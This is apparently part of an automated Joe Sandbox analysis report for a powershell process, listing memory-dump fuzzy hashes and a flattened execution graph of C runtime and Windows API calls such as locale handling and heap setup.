                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f6da2a45381d8f80739f15059a786127290df654e4c31f20d5cb081166cb685
                                                                                                                                • Instruction ID: 9972a72fd1ecdbcd91cd245fa31ab02109eee65eaf72ace8102fd5c1e62dfeed
                                                                                                                                • Opcode Fuzzy Hash: 1f6da2a45381d8f80739f15059a786127290df654e4c31f20d5cb081166cb685
                                                                                                                                • Instruction Fuzzy Hash: F331D631A2CA494FDB58EB0CC4D59B173E1FB9A315B24417DE88EC3296E926FC42C781
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c7f6fa202644ee59e31ca58ba6e190e5cd9a35fef7b6bea7bf0a0abb06fad7ea
                                                                                                                                • Instruction ID: 7210c18f2bb4c1b4931863c5096ad329e2d08c96a54ce0d87c0d0774cb42ef90
                                                                                                                                • Opcode Fuzzy Hash: c7f6fa202644ee59e31ca58ba6e190e5cd9a35fef7b6bea7bf0a0abb06fad7ea
                                                                                                                                • Instruction Fuzzy Hash: 95212731A1890D8FDF84EF48D481EEDB7A1FB69310F244165E80DD7291DE35E881CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 02682301d9818af3e297ffc7b3cb8049b88b87a966c0fc3c293687aaaef2cf02
                                                                                                                                • Instruction ID: 68a81acf36f2cafb6fe227714c1578dd5005c223ed4c75cd96644fe2574d420d
                                                                                                                                • Opcode Fuzzy Hash: 02682301d9818af3e297ffc7b3cb8049b88b87a966c0fc3c293687aaaef2cf02
                                                                                                                                • Instruction Fuzzy Hash: 5501A73055CB0C4FD748EF0CE491AA6B3E0FB85324F10052DE58AC3251DA32E882CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702280665.00007FFA34B00000.00000040.00000001.sdmp, Offset: 00007FFA34B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34b00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3c0c98d11a206343d0d1e9b30a990367af57684e613e1524733cf71416a1446
                                                                                                                                • Instruction ID: f82b329f7b70192ab5c53f496d9ff9a0c9635cd55849a82131141234acaa4978
                                                                                                                                • Opcode Fuzzy Hash: a3c0c98d11a206343d0d1e9b30a990367af57684e613e1524733cf71416a1446
                                                                                                                                • Instruction Fuzzy Hash: E8F0C812F09E1A0BF6B9971C18552B8D5D2EF9A621B88C1BBD90FD7197DD0ADC1003C2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1e37ccd20ab39043fde80ac97480b212534a06901c25ac50df5191e3341c673d
                                                                                                                                • Instruction ID: 010d9585532f0da273b20655a3a9f35bff930a39303fdd596bb1c07d726b5bfc
                                                                                                                                • Opcode Fuzzy Hash: 1e37ccd20ab39043fde80ac97480b212534a06901c25ac50df5191e3341c673d
                                                                                                                                • Instruction Fuzzy Hash: 69F0303276C6044EDB5CAA0CF8835B573D1E78A220B50417FF88FC2696E917B8428685
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 941e497b2580f94ae07a52eceba57cd32a59111e14f713d1ebca8365561c9ff3
                                                                                                                                • Instruction ID: d8dc3bf61990e211ed1cb2283bd14ac2a3f4ded82f75c8cedf1a2cef22ef0b52
                                                                                                                                • Opcode Fuzzy Hash: 941e497b2580f94ae07a52eceba57cd32a59111e14f713d1ebca8365561c9ff3
                                                                                                                                • Instruction Fuzzy Hash: F0F0303276C6044FD75CAA0CE8929B573D1E78A224B50417EE88EC2286E916F8428685
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

Non-executed Functions

                                                                                                                                • Instruction ID: 5a5e1c54b87a7af32270eeeaffbbbfff5d2cc98eae024d2fdbad759650788c95
                                                                                                                                • Opcode Fuzzy Hash: 2dc5089cc21962e91611c27e47fb7a62693508ccf7d74e5d9dea90b703786c58
                                                                                                                                • Instruction Fuzzy Hash: 55513A32E1C6554FE7289F6CA4C55B277D1EB8A320B14C57FE88EC7197EE2978458380
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:15.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:6.3%
                                                                                                                                Total number of Nodes:1516
                                                                                                                                Total number of Limit Nodes:26

                                                                                                                                Graph

10828->10829 10830 10010f4e 10829->10830 10831 100088c4 __setlocale_set_cat 69 API calls 10830->10831 10832 10010f59 10831->10832 10833 100088c4 __setlocale_set_cat 69 API calls 10832->10833 10834 10010f64 10833->10834 10835 100088c4 __setlocale_set_cat 69 API calls 10834->10835 10836 10010f6f 10835->10836 10837 100088c4 __setlocale_set_cat 69 API calls 10836->10837 10838 10010f7a 10837->10838 10839 100088c4 __setlocale_set_cat 69 API calls 10838->10839 10840 10010f85 10839->10840 10841 100088c4 __setlocale_set_cat 69 API calls 10840->10841 10842 10010f90 10841->10842 10843 100088c4 __setlocale_set_cat 69 API calls 10842->10843 10844 10010f9b 10843->10844 10845 100088c4 __setlocale_set_cat 69 API calls 10844->10845 10845->10846 10846->10720 10847->10690 10851 1000b962 LeaveCriticalSection 10848->10851 10850 1000fbe5 10850->10668 10851->10850 10853 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 10852->10853 10854 10010246 10853->10854 10855 1001046f 10854->10855 10856 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 10855->10856 10857 10010482 10856->10857 10860 100102b5 10857->10860 10861 10010301 10860->10861 10862 100102d6 GetStringTypeW 10860->10862 10863 100103e8 10861->10863 10865 100102ee 10861->10865 10864 100102f6 GetLastError 10862->10864 10862->10865 10888 10010000 GetLocaleInfoA 10863->10888 10864->10861 10866 1001033a MultiByteToWideChar 10865->10866 10883 100103e2 10865->10883 10872 10010367 10866->10872 10866->10883 10868 10007528 __setlocale_set_cat 5 API calls 10870 1001046d 10868->10870 10870->10640 10871 10010439 GetStringTypeA 10876 10010454 10871->10876 10871->10883 10873 10007586 _malloc 69 API calls 10872->10873 10877 1001037c _memset __alloca_probe_16 10872->10877 10873->10877 10875 100103b5 MultiByteToWideChar 10879 100103cb GetStringTypeW 10875->10879 10880 100103dc 10875->10880 10881 100088c4 __setlocale_set_cat 69 API calls 10876->10881 10877->10875 10877->10883 10879->10880 10884 10007671 10880->10884 10881->10883 10883->10868 
10885 1000767d 10884->10885 10886 1000768e 10884->10886 10885->10886 10887 100088c4 __setlocale_set_cat 69 API calls 10885->10887 10886->10883 10887->10886 10889 10010033 10888->10889 10892 1001002e 10888->10892 10919 10007650 10889->10919 10891 10007528 __setlocale_set_cat 5 API calls 10893 10010047 10891->10893 10892->10891 10893->10871 10893->10883 10894 10010049 10893->10894 10895 10010089 GetCPInfo 10894->10895 10899 10010113 10894->10899 10896 100100a0 10895->10896 10897 100100fe MultiByteToWideChar 10895->10897 10896->10897 10900 100100a6 GetCPInfo 10896->10900 10897->10899 10903 100100b9 _strlen 10897->10903 10898 10007528 __setlocale_set_cat 5 API calls 10901 100101fb 10898->10901 10899->10898 10900->10897 10902 100100b3 10900->10902 10901->10871 10901->10883 10902->10897 10902->10903 10904 10007586 _malloc 69 API calls 10903->10904 10906 100100eb _memset __alloca_probe_16 10903->10906 10904->10906 10905 10010148 MultiByteToWideChar 10907 10010160 10905->10907 10908 1001017f 10905->10908 10906->10899 10906->10905 10910 10010184 10907->10910 10911 10010167 WideCharToMultiByte 10907->10911 10909 10007671 __crtLCMapStringA_stat 69 API calls 10908->10909 10909->10899 10912 100101a3 10910->10912 10913 1001018f WideCharToMultiByte 10910->10913 10911->10908 10914 10009e8c __calloc_crt 69 API calls 10912->10914 10913->10908 10913->10912 10915 100101ab 10914->10915 10915->10908 10916 100101b4 WideCharToMultiByte 10915->10916 10916->10908 10917 100101c6 10916->10917 10918 100088c4 __setlocale_set_cat 69 API calls 10917->10918 10918->10908 10920 1000db09 __wcstoi64 93 API calls 10919->10920 10921->10026 10923 10007a75 10924 10007a80 10923->10924 10925 10007a85 10923->10925 10937 1000e372 10924->10937 10929 1000797f 10925->10929 10928 10007a93 10930 1000798b _flsall 10929->10930 10934 100079d8 ___DllMainCRTStartup 10930->10934 10935 10007a28 _flsall 10930->10935 10941 1000784a 10930->10941 10932 10007a08 10933 1000784a __CRT_INIT@12 156 API calls 10932->10933 
10932->10935 10933->10935 10934->10932 10934->10935 10936 1000784a __CRT_INIT@12 156 API calls 10934->10936 10935->10928 10936->10932 10938 1000e3a4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 10937->10938 10939 1000e397 10937->10939 10940 1000e39b 10938->10940 10939->10938 10939->10940 10940->10925 10942 100078d5 10941->10942 10943 10007859 10941->10943 10945 100078db 10942->10945 10946 1000790c 10942->10946 10990 1000d836 HeapCreate 10943->10990 10955 100078f6 10945->10955 10964 10007864 10945->10964 11081 1000b863 10945->11081 10947 10007911 10946->10947 10948 1000796a 10946->10948 10950 1000c212 ___set_flsgetvalue 9 API calls 10947->10950 10948->10964 11118 1000c52c 10948->11118 10951 10007916 10950->10951 10957 10009e8c __calloc_crt 69 API calls 10951->10957 10956 1000b4c0 __ioterm 70 API calls 10955->10956 10955->10964 10959 10007900 10956->10959 10960 10007922 10957->10960 10958 10007870 __RTC_Initialize 10961 10007874 10958->10961 10966 10007880 GetCommandLineA 10958->10966 10963 1000c246 __mtterm 8 API calls 10959->10963 10960->10964 10967 1000c197 __decode_pointer 7 API calls 10960->10967 11084 1000d866 10961->11084 10965 10007905 10963->10965 10964->10934 10968 1000d866 __heap_term 4 API calls 10965->10968 11026 1000e068 10966->11026 10970 10007940 10967->10970 10968->10964 10973 10007947 10970->10973 10974 1000795e 10970->10974 10976 1000c283 __initptd 69 API calls 10973->10976 10977 100088c4 __setlocale_set_cat 69 API calls 10974->10977 10975 1000789a 10978 1000789e 10975->10978 11096 1000dfad 10975->11096 10979 1000794e GetCurrentThreadId 10976->10979 10977->10964 11090 1000c246 10978->11090 10979->10964 10982 100078aa 10983 100078be 10982->10983 11066 1000dd35 10982->11066 10989 100078c3 10983->10989 11113 1000b4c0 10983->11113 10989->10964 10991 1000785f 10990->10991 10991->10964 10992 1000c59a GetModuleHandleW 10991->10992 10993 1000c5b5 10992->10993 10994 1000c5ae 10992->10994 10996 1000c71d 
10993->10996 10997 1000c5bf GetProcAddress GetProcAddress GetProcAddress GetProcAddress 10993->10997 10995 1000b5ad __crt_waiting_on_module_handle 2 API calls 10994->10995 10999 1000c5b4 10995->10999 10998 1000c246 __mtterm 8 API calls 10996->10998 11000 1000c608 TlsAlloc 10997->11000 11002 1000c722 10998->11002 10999->10993 11000->11002 11003 1000c656 TlsSetValue 11000->11003 11002->10958 11003->11002 11004 1000c667 11003->11004 11129 1000b872 11004->11129 11007 1000c11c __encode_pointer 7 API calls 11008 1000c677 11007->11008 11009 1000c11c __encode_pointer 7 API calls 11008->11009 11010 1000c687 11009->11010 11011 1000c11c __encode_pointer 7 API calls 11010->11011 11012 1000c697 11011->11012 11013 1000c11c __encode_pointer 7 API calls 11012->11013 11014 1000c6a7 11013->11014 11136 1000b8c0 11014->11136 11017 1000c197 __decode_pointer 7 API calls 11018 1000c6c8 11017->11018 11018->10996 11019 10009e8c __calloc_crt 69 API calls 11018->11019 11020 1000c6e1 11019->11020 11020->10996 11021 1000c197 __decode_pointer 7 API calls 11020->11021 11022 1000c6fb 11021->11022 11022->10996 11023 1000c702 11022->11023 11024 1000c283 __initptd 69 API calls 11023->11024 11025 1000c70a GetCurrentThreadId 11024->11025 11025->11002 11027 1000e086 GetEnvironmentStringsW 11026->11027 11031 1000e0a5 11026->11031 11028 1000e09a GetLastError 11027->11028 11029 1000e08e 11027->11029 11028->11031 11032 1000e0d0 WideCharToMultiByte 11029->11032 11033 1000e0c1 GetEnvironmentStringsW 11029->11033 11030 1000e13e 11034 1000e147 GetEnvironmentStrings 11030->11034 11035 10007890 11030->11035 11031->11029 11031->11030 11038 1000e133 FreeEnvironmentStringsW 11032->11038 11039 1000e104 11032->11039 11033->11032 11033->11035 11034->11035 11036 1000e157 11034->11036 11051 1000b26c 11035->11051 11040 10009e47 __malloc_crt 69 API calls 11036->11040 11038->11035 11148 10009e47 11039->11148 11042 1000e171 11040->11042 11044 1000e184 __setlocale_set_cat 11042->11044 11045 1000e178 FreeEnvironmentStringsA 
11042->11045 11049 1000e18e FreeEnvironmentStringsA 11044->11049 11045->11035 11046 1000e112 WideCharToMultiByte 11047 1000e12c 11046->11047 11048 1000e124 11046->11048 11047->11038 11050 100088c4 __setlocale_set_cat 69 API calls 11048->11050 11049->11035 11050->11047 11154 1000b078 11051->11154 11053 1000b278 GetStartupInfoA 11054 10009e8c __calloc_crt 69 API calls 11053->11054 11061 1000b299 11054->11061 11055 1000b4b7 _flsall 11055->10975 11056 1000b434 GetStdHandle 11065 1000b3fe 11056->11065 11057 10009e8c __calloc_crt 69 API calls 11057->11061 11058 1000b499 SetHandleCount 11058->11055 11059 1000b446 GetFileType 11059->11065 11060 1000b381 11060->11055 11062 1000b3aa GetFileType 11060->11062 11064 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 11060->11064 11060->11065 11061->11055 11061->11057 11061->11060 11061->11065 11062->11060 11063 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 11063->11065 11064->11060 11065->11055 11065->11056 11065->11058 11065->11059 11065->11063 11067 1000dd3e 11066->11067 11069 1000dd43 _strlen 11066->11069 11155 1000ffe2 11067->11155 11070 10009e8c __calloc_crt 69 API calls 11069->11070 11073 100078b3 11069->11073 11076 1000dd78 _strlen 11070->11076 11071 1000ddd6 11072 100088c4 __setlocale_set_cat 69 API calls 11071->11072 11072->11073 11073->10983 11107 1000b69c 11073->11107 11074 10009e8c __calloc_crt 69 API calls 11074->11076 11075 1000ddfc 11077 100088c4 __setlocale_set_cat 69 API calls 11075->11077 11076->11071 11076->11073 11076->11074 11076->11075 11078 1000bdd5 _strcpy_s 69 API calls 11076->11078 11079 1000ddbd 11076->11079 11077->11073 11078->11076 11079->11076 11080 10006f64 __invoke_watson 10 API calls 11079->11080 11080->11079 11273 1000b721 11081->11273 11083 1000b86e 11083->10955 11085 1000d8c6 HeapDestroy 11084->11085 11086 1000d86f 11084->11086 11085->10964 11087 1000d8b4 HeapFree 11086->11087 11088 1000d88b VirtualFree HeapFree 11086->11088 11087->11085 11088->11088 11089 
1000d8b3 11088->11089 11089->11087 11091 1000c250 11090->11091 11092 1000c25c 11090->11092 11093 1000c197 __decode_pointer 7 API calls 11091->11093 11094 1000c270 TlsFree 11092->11094 11095 1000c27e 11092->11095 11093->11092 11094->11095 11095->11095 11097 1000dfc2 11096->11097 11098 1000dfc7 GetModuleFileNameA 11096->11098 11099 1000ffe2 ___initmbctable 113 API calls 11097->11099 11100 1000dfee 11098->11100 11099->11098 11298 1000de13 11100->11298 11102 1000e04a 11102->10982 11104 10009e47 __malloc_crt 69 API calls 11105 1000e030 11104->11105 11105->11102 11106 1000de13 _parse_cmdline 79 API calls 11105->11106 11106->11102 11108 1000b6aa __IsNonwritableInCurrentImage 11107->11108 11310 10013694 11108->11310 11110 1000b6c8 __initterm_e 11111 100077b8 __cinit 76 API calls 11110->11111 11112 1000b6e7 __IsNonwritableInCurrentImage __initterm 11110->11112 11111->11112 11112->10983 11115 1000b4c9 11113->11115 11114 100078d3 11114->10978 11115->11114 11116 1000b4dd DeleteCriticalSection 11115->11116 11117 100088c4 __setlocale_set_cat 69 API calls 11115->11117 11116->11115 11117->11115 11119 1000c585 11118->11119 11120 1000c53a 11118->11120 11122 1000c598 11119->11122 11123 1000c58f TlsSetValue 11119->11123 11121 1000c540 TlsGetValue 11120->11121 11125 1000c563 11120->11125 11124 1000c553 TlsGetValue 11121->11124 11121->11125 11122->10964 11123->11122 11124->11125 11126 1000c197 __decode_pointer 7 API calls 11125->11126 11127 1000c57a 11126->11127 11314 1000c3fd 11127->11314 11130 1000c18e __init_pointers 7 API calls 11129->11130 11131 1000b87a __init_pointers __initp_misc_winsig 11130->11131 11140 1000cc0b 11131->11140 11134 1000c11c __encode_pointer 7 API calls 11135 1000b8b6 11134->11135 11135->11007 11137 1000b8cb 11136->11137 11139 1000b8f9 11137->11139 11143 10013b8c 11137->11143 11139->10996 11139->11017 11141 1000c11c __encode_pointer 7 API calls 11140->11141 11142 1000b8ac 11141->11142 11142->11134 11147 1000b078 11143->11147 11145 10013b98 
InitializeCriticalSectionAndSpinCount 11146 10013bdc _flsall 11145->11146 11146->11137 11147->11145 11151 10009e50 11148->11151 11149 10007586 _malloc 68 API calls 11149->11151 11150 10009e86 11150->11038 11150->11046 11151->11149 11151->11150 11152 10009e67 Sleep 11151->11152 11153 10009e7c 11152->11153 11153->11150 11153->11151 11154->11053 11156 1000ffeb 11155->11156 11157 1000fff2 11155->11157 11159 1000fe48 11156->11159 11157->11069 11160 1000fe54 _flsall 11159->11160 11161 1000c3e3 __getptd 69 API calls 11160->11161 11162 1000fe5d 11161->11162 11163 1000fb43 _LocaleUpdate::_LocaleUpdate 71 API calls 11162->11163 11164 1000fe67 11163->11164 11190 1000fbe7 11164->11190 11167 10009e47 __malloc_crt 69 API calls 11168 1000fe88 11167->11168 11169 1000ffa7 _flsall 11168->11169 11197 1000fc63 11168->11197 11169->11157 11172 1000ffb4 11172->11169 11177 1000ffc7 11172->11177 11178 100088c4 __setlocale_set_cat 69 API calls 11172->11178 11173 1000feb8 InterlockedDecrement 11174 1000fec8 11173->11174 11175 1000fed9 InterlockedIncrement 11173->11175 11174->11175 11180 100088c4 __setlocale_set_cat 69 API calls 11174->11180 11175->11169 11176 1000feef 11175->11176 11176->11169 11182 1000ba3c __lock 69 API calls 11176->11182 11179 1000b02e _fputc 69 API calls 11177->11179 11178->11177 11179->11169 11181 1000fed8 11180->11181 11181->11175 11184 1000ff03 InterlockedDecrement 11182->11184 11185 1000ff92 InterlockedIncrement 11184->11185 11186 1000ff7f 11184->11186 11207 1000ffa9 11185->11207 11186->11185 11188 100088c4 __setlocale_set_cat 69 API calls 11186->11188 11189 1000ff91 11188->11189 11189->11185 11191 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 11190->11191 11192 1000fbfb 11191->11192 11193 1000fc24 11192->11193 11194 1000fc06 GetOEMCP 11192->11194 11195 1000fc29 GetACP 11193->11195 11196 1000fc16 11193->11196 11194->11196 11195->11196 11196->11167 11196->11169 11198 1000fbe7 getSystemCP 81 API calls 11197->11198 11199 1000fc83 11198->11199 11200 1000fc8e setSBCS 
11199->11200 11203 1000fcd2 IsValidCodePage 11199->11203 11206 1000fcf7 _memset __setmbcp_nolock 11199->11206 11201 10007528 __setlocale_set_cat 5 API calls 11200->11201 11202 1000fe46 11201->11202 11202->11172 11202->11173 11203->11200 11204 1000fce4 GetCPInfo 11203->11204 11204->11200 11204->11206 11210 1000f9b0 GetCPInfo 11206->11210 11272 1000b962 LeaveCriticalSection 11207->11272 11209 1000ffb0 11209->11169 11211 1000fa96 11210->11211 11214 1000f9e4 _memset 11210->11214 11216 10007528 __setlocale_set_cat 5 API calls 11211->11216 11212 1001046f ___crtGetStringTypeA 93 API calls 11213 1000fa51 11212->11213 11220 1000986e 11213->11220 11214->11212 11218 1000fb41 11216->11218 11218->11206 11219 1000986e ___crtLCMapStringA 104 API calls 11219->11211 11221 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 11220->11221 11222 10009881 11221->11222 11225 100094c9 11222->11225 11226 100094ea LCMapStringW 11225->11226 11230 10009505 11225->11230 11227 1000950d GetLastError 11226->11227 11226->11230 11227->11230 11228 10009703 11232 10010000 ___ansicp 93 API calls 11228->11232 11229 1000955f 11231 10009578 MultiByteToWideChar 11229->11231 11252 100096fa 11229->11252 11230->11228 11230->11229 11240 100095a5 11231->11240 11231->11252 11234 1000972b 11232->11234 11233 10007528 __setlocale_set_cat 5 API calls 11235 1000986c 11233->11235 11236 10009744 11234->11236 11237 1000981f LCMapStringA 11234->11237 11234->11252 11235->11219 11238 10010049 ___convertcp 76 API calls 11236->11238 11271 1000977b 11237->11271 11243 10009756 11238->11243 11239 100095f6 MultiByteToWideChar 11244 1000960f LCMapStringW 11239->11244 11265 100096f1 11239->11265 11242 10007586 _malloc 69 API calls 11240->11242 11249 100095be __alloca_probe_16 11240->11249 11241 10009846 11251 100088c4 __setlocale_set_cat 69 API calls 11241->11251 11241->11252 11242->11249 11246 10009760 LCMapStringA 11243->11246 11243->11252 11248 10009630 11244->11248 11244->11265 11245 100088c4 __setlocale_set_cat 69 API calls 
11245->11241 11255 10009782 11246->11255 11246->11271 11247 10007671 __crtLCMapStringA_stat 69 API calls 11247->11252 11250 10009639 11248->11250 11254 10009662 11248->11254 11249->11239 11249->11252 11253 1000964b LCMapStringW 11250->11253 11250->11265 11251->11252 11252->11233 11253->11265 11258 10007586 _malloc 69 API calls 11254->11258 11268 1000967d __alloca_probe_16 11254->11268 11257 10009793 _memset __alloca_probe_16 11255->11257 11259 10007586 _malloc 69 API calls 11255->11259 11256 100096b1 LCMapStringW 11260 100096c9 WideCharToMultiByte 11256->11260 11261 100096eb 11256->11261 11263 100097d1 LCMapStringA 11257->11263 11257->11271 11258->11268 11259->11257 11260->11261 11262 10007671 __crtLCMapStringA_stat 69 API calls 11261->11262 11262->11265 11266 100097f1 11263->11266 11267 100097ed 11263->11267 11265->11247 11269 10010049 ___convertcp 76 API calls 11266->11269 11270 10007671 __crtLCMapStringA_stat 69 API calls 11267->11270 11268->11256 11268->11265 11269->11267 11270->11271 11271->11241 11271->11245 11272->11209 11274 1000b72d _flsall 11273->11274 11275 1000ba3c __lock 69 API calls 11274->11275 11276 1000b734 11275->11276 11278 1000c197 __decode_pointer 7 API calls 11276->11278 11283 1000b7ed __initterm 11276->11283 11280 1000b76b 11278->11280 11280->11283 11285 1000c197 __decode_pointer 7 API calls 11280->11285 11281 1000b847 _flsall 11281->11083 11282 1000b81f 11296 1000b962 LeaveCriticalSection 11282->11296 11292 1000b838 11283->11292 11291 1000b780 11285->11291 11286 1000b82c 11287 1000b631 __mtinitlocknum 3 API calls 11286->11287 11288 1000b835 11287->11288 11288->11281 11289 1000c18e 7 API calls __init_pointers 11289->11291 11290 1000c197 7 API calls __decode_pointer 11290->11291 11291->11283 11291->11289 11291->11290 11293 1000b819 11292->11293 11294 1000b83e 11292->11294 11293->11281 11293->11282 11297 1000b962 LeaveCriticalSection 11294->11297 11296->11286 11297->11293 11300 1000de32 11298->11300 11302 1000de9f 11300->11302 11304 1001421e 
11300->11304 11301 1000df9d 11301->11102 11301->11104 11302->11301 11303 1001421e 79 API calls _parse_cmdline 11302->11303 11303->11302 11307 100141cb 11304->11307 11308 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 11307->11308 11309 100141de 11308->11309 11309->11300 11311 1001369a 11310->11311 11312 1000c11c __encode_pointer 7 API calls 11311->11312 11313 100136b2 11311->11313 11312->11311 11313->11110 11316 1000c409 _flsall 11314->11316 11315 1000c421 11319 1000c42f 11315->11319 11320 100088c4 __setlocale_set_cat 69 API calls 11315->11320 11316->11315 11317 1000c50b _flsall 11316->11317 11318 100088c4 __setlocale_set_cat 69 API calls 11316->11318 11317->11119 11318->11315 11321 1000c43d 11319->11321 11323 100088c4 __setlocale_set_cat 69 API calls 11319->11323 11320->11319 11322 1000c44b 11321->11322 11324 100088c4 __setlocale_set_cat 69 API calls 11321->11324 11325 1000c459 11322->11325 11326 100088c4 __setlocale_set_cat 69 API calls 11322->11326 11323->11321 11324->11322 11327 1000c467 11325->11327 11328 100088c4 __setlocale_set_cat 69 API calls 11325->11328 11326->11325 11329 1000c475 11327->11329 11331 100088c4 __setlocale_set_cat 69 API calls 11327->11331 11328->11327 11330 1000c486 11329->11330 11332 100088c4 __setlocale_set_cat 69 API calls 11329->11332 11333 1000ba3c __lock 69 API calls 11330->11333 11331->11329 11332->11330 11334 1000c48e 11333->11334 11335 1000c49a InterlockedDecrement 11334->11335 11342 1000c4b3 11334->11342 11336 1000c4a5 11335->11336 11335->11342 11339 100088c4 __setlocale_set_cat 69 API calls 11336->11339 11336->11342 11339->11342 11340 1000ba3c __lock 69 API calls 11341 1000c4c7 11340->11341 11343 1000c4f8 11341->11343 11344 1000a215 ___removelocaleref 8 API calls 11341->11344 11350 1000c517 11342->11350 11353 1000c523 11343->11353 11348 1000c4dc 11344->11348 11347 100088c4 __setlocale_set_cat 69 API calls 11347->11317 11348->11343 11349 1000a03d _setlocale 69 API calls 11348->11349 11349->11343 11356 1000b962 
LeaveCriticalSection 11350->11356 11352 1000c4c0 11352->11340 11357 1000b962 LeaveCriticalSection 11353->11357 11355 1000c505 11355->11347 11356->11352 11357->11355 12260 10005a95 12261 10005ab7 12260->12261 12269 10005af4 12260->12269 12270 10005664 12261->12270 12274 10005670 __EH_prolog3_GS 12270->12274 12271 10005693 12341 10007bde 12271->12341 12274->12271 12318 1000563a 12274->12318 12276 10004aee 7 API calls ctype 12281 100056a5 12276->12281 12277 100056f4 12278 10001220 std::locale::_Locimp::~_Locimp 69 API calls 12277->12278 12278->12271 12279 10005335 7 API calls ctype 12279->12281 12281->12276 12281->12277 12281->12279 12322 1000910b 12281->12322 12335 1000540e 12281->12335 12319 10005650 std::_Locinfo::_Locinfo 12318->12319 12344 10005460 12319->12344 12321 1000565d 12321->12281 12323 10009117 _flsall 12322->12323 12324 1000914f 12323->12324 12325 1000912f 12323->12325 12327 10009144 _flsall 12323->12327 12360 100067f9 12324->12360 12326 1000b02e _fputc 69 API calls 12325->12326 12329 10009134 12326->12329 12327->12281 12331 1000708c _fputc 7 API calls 12329->12331 12331->12327 12336 10005424 12335->12336 12337 10005429 12335->12337 12338 1000481d std::_String_base::_Xlen 77 API calls 12336->12338 12339 10001470 ctype 77 API calls 12337->12339 12340 1000543d std::_Locinfo::_Locinfo ctype 12337->12340 12338->12337 12339->12340 12340->12281 12342 10007528 __setlocale_set_cat 5 API calls 12341->12342 12343 10007be8 12342->12343 12343->12343 12345 10005471 12344->12345 12346 10005476 12344->12346 12347 1000481d std::_String_base::_Xlen 77 API calls 12345->12347 12350 10001470 12346->12350 12347->12346 12349 10005480 std::_Locinfo::_Locinfo ctype 12349->12321 12351 10001482 12350->12351 12352 1000147d 12350->12352 12354 10001489 12351->12354 12357 100014a2 12351->12357 12353 1000481d std::_String_base::_Xlen 77 API calls 12352->12353 12353->12351 12355 10001300 std::_String_base::_Xlen 77 API calls 12354->12355 12356 10001495 12355->12356 12356->12349 12358 
